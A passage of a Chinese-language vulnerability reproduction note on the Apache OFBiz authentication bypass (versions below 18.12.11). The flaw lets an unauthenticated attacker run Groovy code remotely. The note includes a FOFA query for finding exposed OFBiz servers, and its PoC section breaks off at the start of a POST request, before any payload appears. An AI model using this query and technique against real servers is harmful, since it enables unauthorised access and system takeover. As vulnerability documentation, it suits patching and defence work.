0x01 产品简介
Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
0x02 漏洞概述
漏洞成因
该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行
漏洞影响
未授权访问和潜在的远程代码执行:此漏洞可能允许攻击者绕过安全限制,实现未授权访问和远程代码执行,严重时可能导致数据泄露、系统控制权被夺取。
0x03 影响范围
Apache Ofbiz < 18.12.11
0x04 复现环境
FOFA:
cert="Organizational Unit: Apache OFBiz" || (body="www.ofbiz.org" && body="/images/ofbiz_powered.gif") || header="Set-Cookie: OFBiz.Visitor" || banner="Set-Cookie: OFBiz.Visitor"
0x05 漏洞复现
PoC
POST /webtools/co
